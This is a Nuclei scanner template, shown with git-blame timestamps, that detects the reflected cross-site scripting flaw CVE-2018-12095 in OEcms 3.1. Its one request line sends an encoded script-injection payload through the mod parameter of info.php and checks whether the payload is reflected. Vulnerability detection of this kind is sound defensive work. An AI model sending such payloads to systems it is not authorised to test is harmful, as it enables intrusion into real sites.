nuclei-templates/http/cves/2018/CVE-2018-12095.yaml

49 lines
1.3 KiB
YAML
Raw Normal View History

2021-08-24 17:29:51 +00:00
id: CVE-2018-12095
info:
name: OEcms 3.1 - Cross-Site Scripting
2021-08-24 19:27:07 +00:00
author: LogicalHunter
2021-08-24 17:29:51 +00:00
severity: medium
description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
2021-08-25 11:25:53 +00:00
reference:
2021-08-24 17:29:51 +00:00
- https://www.exploit-db.com/exploits/44895
2021-08-25 11:25:53 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
2021-08-24 17:29:51 +00:00
- https://cxsecurity.com/issue/WLB-2018060092
- https://nvd.nist.gov/vuln/detail/CVE-2018-12095
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2018-12095
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00407
2023-08-31 11:46:18 +00:00
epss-percentile: 0.70495
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: oecms_project
product: oecms
tags: cve,cve2018,xss,edb
2021-08-24 17:29:51 +00:00
http:
2021-08-24 17:29:51 +00:00
- method: GET
path:
2021-08-25 11:25:53 +00:00
- '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-08-24 17:29:51 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-08-24 17:29:51 +00:00
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
2021-08-25 11:25:53 +00:00
words:
- text/html
2021-08-24 17:29:51 +00:00
- type: status
status:
- 200